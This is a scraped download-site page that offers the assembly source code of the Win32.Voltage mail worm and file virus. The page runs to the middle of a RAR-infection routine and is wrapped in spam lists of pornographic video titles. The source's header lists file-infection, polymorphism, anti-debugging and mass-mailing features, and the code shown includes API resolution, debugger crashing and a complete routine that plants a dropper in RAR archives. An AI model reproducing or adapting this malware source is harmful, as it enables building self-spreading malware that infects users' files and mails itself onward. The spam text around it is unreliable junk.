亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? i-worm_win32.voltage病毒源代碼.txt

?? I-Worm_Win32.Voltage病毒源代碼
?? TXT
?? 第 1 頁 / 共 5 頁
字號:
; I-Worm\Win32.Voltage by DR-EF (c) 2004,Version 2.2
; --------------------------------------------------
; 
; Virus Name:Win32.Voltage
; Virus Size:22k
; Type:PE\RAR Infector\Mail worm
; Author:DR-EF
;
; Virus Features:
; ---------------
; - use the registry shell spawning technice to infect exe files
;  when they executed
; - encrypted by 2 layers
; - use EPO
; - polymorphic engine can generate diffrent instructions for the
;  same action,mixed with junk code + using SEH to jump to host
; - infect rar files by adding infected file\dropper
; - anti debugging features
; 
; Mail Worm Features:
; -------------------
; - 5 messages,subjects,filenames
; - SMTP engine + base64 encoder
; - collect mails from WAB & temporary internet files
; - spoof mailfrom
;
; Fixed Bugs From Old Versions:
; -----------------------------
; - search kernel base with SEH walker instead of last stack method
; - dont set code flag at last section,only read/write
; - fixed bug with image size of infected files
; - removed 1 section in the dropper (wvltg.exe)
; - replaced the CheckFileName function


.386
.model flat

extrn MessageBoxA:proc

DEBUG equ 0 ;switch debug version on\off
VirusSize equ (VirusEnd-_main)
EncryptedVirus equ (EncryptedVirusEnd-(_main+EncryptionStart))

.data
db ?

.code

_main: 
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,0ch ;restore stack
call DecryptVirus
EncryptionStart equ ($-_main)
mov esp,[esp + 8h] ;restore stack
pop dword ptr fs:[0]
add esp,4h
VirusStart equ $
call Delta
Delta: pop ebp
sub ebp,offset Delta
call FindKernel
jmp SearchGetProcAddress

Wvltg_EntryPoint:
call Delta_ ;get delta offset
Delta_: pop ebp
sub ebp,offset Delta_
lea eax,[ebp + Exit_V]
push eax
pushad
jmp VirusStart


FindKernel: ;find kernel using SEH walker
    mov eax,fs:[0]
search_last:
    mov edx,[eax]
    inc edx
    jz found_last
    dec edx
    xchg edx,eax
    jmp search_last
found_last:
    mov eax,[eax+4]
    and eax,0ffff0000h
search_mz:
    cmp word ptr [eax],"ZM"
    jz found_mz
    sub eax,10000h
    jmp search_mz
found_mz:
mov [ebp + kernel32base],eax
ret

kernel32base dd 0
_GetProcAddress db "GetProcAddress",0
__GetProcAddress dd 0
ApiNamesTable:

_CreateFile db "CreateFileA",0
_CloseHandle db "CloseHandle",0
_CreateFileMapping db "CreateFileMappingA",0
_MapViewOfFile db "MapViewOfFile",0
_UnmapViewOfFile db "UnmapViewOfFile",0
_GetCommandLine db "GetCommandLineA",0
_CreateProcess db "CreateProcessA",0
_LoadLibrary db "LoadLibraryA",0
_FreeLibrary db "FreeLibrary",0
GetSystemDirectoryA db "GetSystemDirectoryA",0
lstrcatA db "lstrcatA",0
_GetModuleFileName db "GetModuleFileNameA",0
_SetFileAttributesA db "SetFileAttributesA",0
_GetStartupInfoA db "GetStartupInfoA",0
_GetFileSize db "GetFileSize",0
_SetFilePointer db "SetFilePointer",0
_SetEndOfFile db "SetEndOfFile",0
_GetTickCount db "GetTickCount",0
_GlobalAlloc db "GlobalAlloc",0
_GlobalFree db "GlobalFree",0
_GetLocalTime db "GetLocalTime",0
_GetFileAttributes db "GetFileAttributesA",0
_GetFileTime db "GetFileTime",0
_SetFileTime db "SetFileTime",0
_DeleteFile db "DeleteFileA",0
_CreateMutexA db "CreateMutexA",0
_OpenMutexA db "OpenMutexA",0
_FindFirstFileA db "FindFirstFileA",0
_FindNextFileA db "FindNextFileA",0
_SetCurrentDirectoryA db "SetCurrentDirectoryA",0
_WriteFile db "WriteFile",0
_FindClose db "FindClose",0
_MultiByteToWideChar db "MultiByteToWideChar",0
_ExitProcess db "ExitProcess",0

ApiAddressTable:

CreateFile dd 0
CloseHandle dd 0
CreateFileMapping dd 0
MapViewOfFile dd 0
UnMapViewOfFile dd 0
GetCommandLine dd 0
CreateProcess dd 0
LoadLibrary dd 0
FreeLibrary dd 0
GetSystemDirectory dd 0
lstrcat dd 0
GetModuleFileName dd 0
SetFileAttributes dd 0
GetStartupInfo dd 0
GetFileSize dd 0
SetFilePointer dd 0
SetEndOfFile dd 0
GetTickCount dd 0
GlobalAlloc dd 0
GlobalFree dd 0
GetLocalTime dd 0
GetFileAttributes dd 0
GetFileTime dd 0
SetFileTime dd 0
DeleteFile dd 0
CreateMutex dd 0
OpenMutex dd 0
FindFirstFile dd 0
FindNextFile dd 0
SetCurrentDirectory dd 0
WriteFile dd 0
FindClose dd 0
MultiByteToWideChar dd 0
ExitProcess dd 0

NumberOfApis equ 34


SearchGetProcAddress:
mov eax,[ebp + kernel32base]
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[ebp + kernel32base]
;eax - kernel32 export table
push eax
xor edx,edx
mov eax,[eax + 20h]
add eax,[ebp + kernel32base]
mov edi,[eax]
add edi,[ebp + kernel32base]
;edi - api names array
dec edi
nxt_cmp:inc edi
lea esi,[ebp + _GetProcAddress]
mov ecx,0eh
rep cmpsb
je search_address
inc edx
nxt_l: cmp byte ptr [edi],0h
je nxt_cmp
inc edi
jmp nxt_l
search_address:
pop eax
;eax - kernel32 export table
;edx - GetProcAddress position
shl edx,1h
mov ebx,[eax + 24h]
add ebx,[ebp + kernel32base]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[ebp + kernel32base]
add ebx,edx
mov ebx,[ebx]
add ebx,[ebp + kernel32base]
mov [ebp + __GetProcAddress],ebx
mov ecx,NumberOfApis
lea eax,[ebp + ApiNamesTable]
lea ebx,[ebp + ApiAddressTable]
mov edx,[ebp + kernel32base]
call get_apis
jc Do_Virus_Actions
jmp ReturnToHost
Do_Virus_Actions:
pushad
lea eax,[ebp + AntiDebug]
push eax
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
mov [eax],ebx ;force debugger to jump
AntiDebug:
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,4h
popad
call CrashDebuggers ;now if we under debugger we simple crash
call GetADVAPI32Apis
jnc ReturnToHost
call GetUser32Apis ;used for debug and payload
jnc ReturnToHost
call AntiLamers
call HideVirus
call ProcessCommandLine
cmp byte ptr [ebp + RunFromExeHooker],1h ;we run from virus exe hooker ?
je ExecuteAndInfectFile
call InstallVirus
jmp ReturnToHost
ExecuteAndInfectFile:
mov byte ptr [ebp + Infection_Success],0h
call InfectFile
call InstallVirus
call PayLoad
call ExecuteFile
call MassMail
lea eax,[ebp + FileDirectory]
call ScanDirectoryForRarFiles
ReturnToHost:
cmp byte ptr [ebp + RunFromExeHooker],1h
jne RetHost
Exit_V:
push eax ;if we running from virus exe hooker
call [ebp + ExitProcess] ;we simple exit
RetHost:popad
db 64h,0a1h,0,0,0,0 ;mov eax,fs:[00000000]
dec ebx
ret

CopyRight db "Win32.Voltage Virus Written By DR-EF (c) 2004",0
SizeOfCopyRight equ ($-CopyRight)

AntiLamers:
lea edx,[ebp + CopyRight] ;)
mov ecx,SizeOfCopyRight 
xor eax,eax 
call xcrc32 
cmp eax,0C3F9A421h 
je NoRip 
xor esp,esp 
NoRip: ret 


GetUser32Apis:
lea eax,[ebp + User32dll]
push eax
call [ebp + LoadLibrary]
xchg eax,edx
mov ecx,NumberOfUser32Functions
lea eax,[ebp + user32_functions_sz]
lea ebx,[ebp + user32_functions_addresses]
call get_apis
ret

User32dll db "User32.dll",0
user32_functions_sz:

_MessageBox db "MessageBoxA",0
_SetWindowTextA db "SetWindowTextA",0

user32_functions_addresses:

MessageBox dd 0
SetWindowText dd 0

NumberOfUser32Functions equ 2


CrashDebuggers: 
lea eax,[ebp + _IsDebuggerPresent]
push eax
push [ebp + kernel32base]
call [ebp + __GetProcAddress]
cmp eax,0h
je NoIDP
call eax
cmp eax,0h
je NoIDP
xor esp,esp ;hang debuggers
NoIDP: ret

_IsDebuggerPresent db "IsDebuggerPresent",0


;eax - pointer to directory name:
ScanDirectoryForRarFiles:
push eax
call [ebp + SetCurrentDirectory]
cmp eax,INVALID_HANDLE_VALUE
je ExitRarScan
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + RarFiles]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitRarScan
mov [ebp + hfind],eax ;save search handle
@rar: call InfectRar
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
cmp eax,0h
jne @rar
ExitRarScan:
ret

RarFiles db "*.rar",0

;rar archive infection procedure:
;tested with rar archive"s that created using winrar v3.20
InfectRar:
call InitRandomNumber
cmp [ebp + nFileSizeLow],300000h
ja ExitRarInfection ;do not infect files that are bigger than 3mb
cmp byte ptr [ebp + Infection_Success],0h
je usewvltg
xor ecx,ecx
lea esi,[ebp + FileToInfect]
GetLen: cmp byte ptr [esi],0h
je CopyPth
inc ecx
inc esi
jmp GetLen
CopyPth:inc ecx
lea esi,[ebp + FileToInfect]
lea edi,[ebp + InfectedDropper] ;use infected file
rep movsb
jmp OpenDropper
usewvltg: 
push 0ffh
lea eax,[ebp + InfectedDropper]
push eax
push 0h
call [ebp + GetModuleFileName] ;use virus dropper
cmp eax,0h
je ExitRarInfection
OpenDropper: 
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[ebp + InfectedDropper]
push eax
call [ebp + CreateFile] ;open the infected dropper
cmp eax,INVALID_HANDLE_VALUE
je ExitRarInfection
mov [ebp + hInfectedDropper],eax
push 0h
push eax
call [ebp + GetFileSize] ;get dropper file size
cmp eax,0ffffffffh
je ExitAndCloseDropperFile
mov [ebp + DropperSize],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push dword ptr [ebp + hInfectedDropper]
call [ebp + CreateFileMapping] ;create file mapping object for the dropper
cmp eax,0h
je ExitAndCloseDropperFile
mov [ebp + hDropperMap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push dword ptr [ebp + hDropperMap]
call [ebp + MapViewOfFile] ;map dropper into memory
cmp eax,0h
je ExitAndCloseDropperMap
mov [ebp + DropperMap],eax
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
push GENERIC_READ or GENERIC_WRITE
lea eax,[ebp + cFileName]
push eax
call [ebp + CreateFile] ;open rar file
cmp eax,INVALID_HANDLE_VALUE
je ExitAndUnMapDropper
mov [ebp + hRarFile],eax
xor eax,eax
push eax
mov eax,[ebp + nFileSizeLow]
add eax,[ebp + DropperSize]
add eax,RarHeaderSize
sub eax,7h ;overwrite rar file sign
push eax
xor eax,eax
push eax
push PAGE_READWRITE
push eax
push dword ptr [ebp + hRarFile]
call [ebp + CreateFileMapping] ;create file mapping object of the rar file
cmp eax,0h
je ExitAndCloseRarFile
mov [ebp + hRarMap],eax
mov eax,[ebp + nFileSizeLow]
add eax,[ebp + DropperSize]
add eax,RarHeaderSize
sub eax,7h ;overwrite rar file sign
push eax
xor eax,eax
push eax
push eax
push FILE_MAP_WRITE
push dword ptr [ebp + hRarMap]
call [ebp + MapViewOfFile]
cmp eax,0h
je ExitAndCloseRarMap
mov [ebp + RarMap],eax
cmp dword ptr [eax],"!raR" ;is rar file ?
jne RarFileInfectionErr
cmp byte ptr [eax + 0fh],1h ;is already infected ?
je RarFileInfectionErr
xor eax,eax
mov edx,[ebp + DropperMap]
mov ecx,[ebp + DropperSize]
call xcrc32 ;get infected dropper crc32 checksum
mov dword ptr [ebp + FILE_CRC],eax ;set it insaid rar header
mov eax,dword ptr [ebp + ftCreationTime + 4]
mov dword ptr [ebp + FTIME],eax ;set random time\data
pushad
mov ecx,6h
lea edi,[ebp + FileInsaidRar]
@RandLetter: 
call GenRandomNumber
and al,19h
add al,61h
stosb
loop @RandLetter ;gen random name for the infected dropper
popad
mov eax,[ebp + DropperSize]
mov [ebp + PACK_SIZE],eax
mov [ebp + UNP_SIZE],eax ;set dropper size insaid of rar header
xor eax,eax
lea edx,[ebp + headcrc]
mov ecx,(EndRarHeader-RarHeader-2)
call xcrc32 ;get crc32 checksum of the rar header
mov word ptr [ebp + HEAD_CRC],ax ;and set it in rar header
lea esi,[ebp + RarHeader]
mov edi,[ebp + RarMap]
add edi,[ebp + nFileSizeLow]
sub edi,7h ;overwrite rar file sign
push edi
mov ecx,RarHeaderSize
rep movsb ;write the rar header into rar file
mov esi,[ebp + DropperMap]
pop edi
add edi,RarHeaderSize
mov ecx,[ebp + DropperSize]
rep movsb ;write the infected dropper into rar file
mov eax,[ebp + RarMap]
push eax
inc byte ptr [eax + 0fh] ;mark the rar file as infected(0fh=reserved1)
mov edx,eax
xor eax,eax
add edx,9h
mov ecx,0bh
call xcrc32 ;get crc32 of the rar main header
pop ebx
mov word ptr [ebx + 7h],ax ;[ebx + 7h]=HEAD_CRC
ExitAndUnMapRarFile:
push [ebp + RarMap]
call [ebp + UnMapViewOfFile]
ExitAndCloseRarMap:
push dword ptr [ebp + hRarMap]
call [ebp + CloseHandle]
ExitAndCloseRarFile:
push dword ptr [ebp + hRarFile]
call [ebp + CloseHandle]
ExitAndUnMapDropper:
push dword ptr [ebp + DropperMap] 
call [ebp + UnMapViewOfFile]
ExitAndCloseDropperMap:
push dword ptr [ebp + hDropperMap]
call [ebp + CloseHandle]
ExitAndCloseDropperFile:
push dword ptr [ebp + hInfectedDropper]
call [ebp + CloseHandle]
ExitRarInfection:
ret
RarFileInfectionErr:
push FILE_BEGIN
push 0h
push dword ptr [ebp + nFileSizeLow]
push dword ptr [ebp + hRarFile]
call [ebp + SetFilePointer]
push dword ptr [ebp + hRarFile]
call [ebp + SetEndOfFile]
jmp ExitAndUnMapRarFile


InfectedDropper db 0ffh dup(0)
hInfectedDropper dd 0
DropperSize dd 0
hDropperMap dd 0
DropperMap dd 0
hRarFile dd 0
hRarMap dd 0
RarMap dd 0



RarHeader:
HEAD_CRC dw 0h
headcrc:HEAD_TYPE db 74h
HEAD_FLAGS dw 8000h ;normal flag
HEAD_SIZE dw RarHeaderSize
PACK_SIZE dd 0h
UNP_SIZE dd 0h
HOST_OS db 0h ;Ms-Dos
FILE_CRC dd 0h
FTIME dd 0h
UNP_VER db 14h
METHOD db 30h ;storing
NAME_SIZE dw 0ah ;file name size
endhcrc:ATTR dd 0h
FileInsaidRar equ $
FILE_NAME db "ReadMe.exe"

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
一区二区三区不卡在线观看 | 国产精品美女视频| 精品一区二区在线免费观看| 日韩欧美一二三区| 国产精品综合一区二区三区| 中文字幕欧美激情| 91蜜桃视频在线| 亚洲va欧美va国产va天堂影院| 51久久夜色精品国产麻豆| 日韩高清在线电影| 国产偷国产偷精品高清尤物| 成人v精品蜜桃久久一区| 亚洲人一二三区| 91精品国产一区二区三区 | 亚洲宅男天堂在线观看无病毒| 在线精品视频小说1| 午夜在线电影亚洲一区| 日韩精品一区二区三区蜜臀| 国产91丝袜在线观看| 樱桃视频在线观看一区| 欧美顶级少妇做爰| 国产精品乡下勾搭老头1| 中文字幕亚洲电影| 制服视频三区第一页精品| 国产精品一区二区三区乱码| 亚洲黄色小视频| 26uuu精品一区二区在线观看| 91免费观看视频| 欧美aaaaaa午夜精品| 国产精品全国免费观看高清| 欧美三区免费完整视频在线观看| 极品瑜伽女神91| 亚洲午夜一二三区视频| 久久精品夜夜夜夜久久| 欧美亚洲国产一卡| 成人一区二区视频| 日韩av电影天堂| 亚洲色图丝袜美腿| 久久久国产午夜精品| 欧美日韩一区二区三区视频| 国产成人精品影视| 日本中文字幕一区二区视频| 中文字幕在线播放不卡一区| 精品蜜桃在线看| 欧美色成人综合| 99久久精品情趣| 狠狠久久亚洲欧美| 三级久久三级久久久| 自拍偷拍亚洲欧美日韩| 久久人人爽人人爽| 欧美丰满美乳xxx高潮www| 一本大道久久a久久综合| 国产高清亚洲一区| 麻豆免费精品视频| 午夜精品久久一牛影视| 亚洲人午夜精品天堂一二香蕉| 精品国产一区二区三区不卡| 在线成人av影院| 在线观看欧美黄色| 色综合久久综合中文综合网| 成人精品鲁一区一区二区| 国产专区欧美精品| 久久er精品视频| 麻豆精品蜜桃视频网站| 亚洲大片精品永久免费| 亚洲你懂的在线视频| 国产精品日韩精品欧美在线| 国产日韩欧美精品一区| 久久婷婷国产综合国色天香| 日韩欧美国产午夜精品| 91精品国产福利在线观看| 精品1区2区3区| 欧美日韩精品系列| 欧美日韩aaaaa| 3d动漫精品啪啪1区2区免费 | www激情久久| 亚洲精品一区二区三区福利| 日韩一区二区三区观看| 欧美一二三区在线| 最新久久zyz资源站| 亚洲国产成人午夜在线一区| 国产性色一区二区| 国产日韩视频一区二区三区| 久久九九全国免费| 国产精品无人区| 亚洲欧美日韩一区二区| 一区二区三区精品视频在线| 亚洲一二三四区| 五月天亚洲婷婷| 久久精品国产免费| 国产一区二区三区| 粗大黑人巨茎大战欧美成人| 成人av小说网| 在线日韩国产精品| 日韩一区二区三区电影在线观看 | 久久精品国产第一区二区三区| 美女mm1313爽爽久久久蜜臀| 国产一区二区三区久久久 | 久久国产精品区| 国产毛片一区二区| 91老师片黄在线观看| 欧美日韩一区二区在线观看| 日韩欧美国产高清| 国产精品国产三级国产a| 一区二区三区欧美| 蜜臀av一区二区在线免费观看 | 国产午夜精品福利| 最好看的中文字幕久久| 亚洲v日本v欧美v久久精品| 蜜桃av一区二区三区| 成人综合激情网| 欧洲一区二区三区在线| 精品日韩一区二区三区 | 精品国产a毛片| 136国产福利精品导航| 日韩国产精品久久| 成人激情黄色小说| 91精品国产综合久久小美女| 国产女主播一区| 亚洲福利一区二区三区| 国产一区不卡视频| 欧美日韩国产另类一区| 欧美激情一区二区三区不卡| 午夜不卡av在线| 国产凹凸在线观看一区二区| 欧美性欧美巨大黑白大战| 精品久久国产97色综合| 亚洲香肠在线观看| 成人免费视频视频| 91精品黄色片免费大全| 亚洲欧美一区二区三区国产精品| 久久69国产一区二区蜜臀| 色综合久久天天| 国产亚洲一区二区在线观看| 三级不卡在线观看| 在线国产电影不卡| 亚洲国产成人在线| 国产在线播放一区三区四| 欧美精品在线观看一区二区| 国产精品麻豆一区二区| 久久精品国产99久久6| 欧美天堂一区二区三区| 国产精品毛片无遮挡高清| 久久9热精品视频| 欧美日韩成人综合在线一区二区 | 色av一区二区| 中文字幕欧美三区| 国产毛片精品视频| 日韩亚洲国产中文字幕欧美| 一区二区欧美国产| 91亚洲国产成人精品一区二区三| 久久日一线二线三线suv| 亚洲成va人在线观看| 一本大道综合伊人精品热热 | 欧美r级在线观看| 天堂在线一区二区| 欧美中文字幕一区二区三区| 国产精品全国免费观看高清| 国产99久久久精品| 久久网站热最新地址| 国产综合久久久久影院| 精品国产区一区| 激情综合网av| 久久久久久97三级| 国产剧情一区在线| 久久久久国色av免费看影院| 狠狠狠色丁香婷婷综合久久五月| 精品区一区二区| 国产乱国产乱300精品| 国产日韩欧美高清| 成人在线一区二区三区| 国产精品久久久久一区二区三区共| 国产盗摄女厕一区二区三区| 欧美国产精品专区| av成人动漫在线观看| 亚洲欧美日韩国产一区二区三区| 一本色道综合亚洲| 亚洲国产综合色| 欧美一区二区三级| 国产一区二区视频在线| 日本一区二区在线不卡| 99久久综合色| 亚洲国产日产av| 欧美一区二区精品| 国产成人免费在线视频| 国产精品国产成人国产三级| 日本伦理一区二区| 日韩精品一二三区| 久久久久久日产精品| 成人免费毛片app| 亚洲一区在线看| 欧美一区2区视频在线观看| 国产最新精品免费| 1000精品久久久久久久久| 欧美优质美女网站| 久久成人18免费观看| 国产精品免费av| 欧美四级电影网| 国产高清久久久久| 亚洲一区在线电影|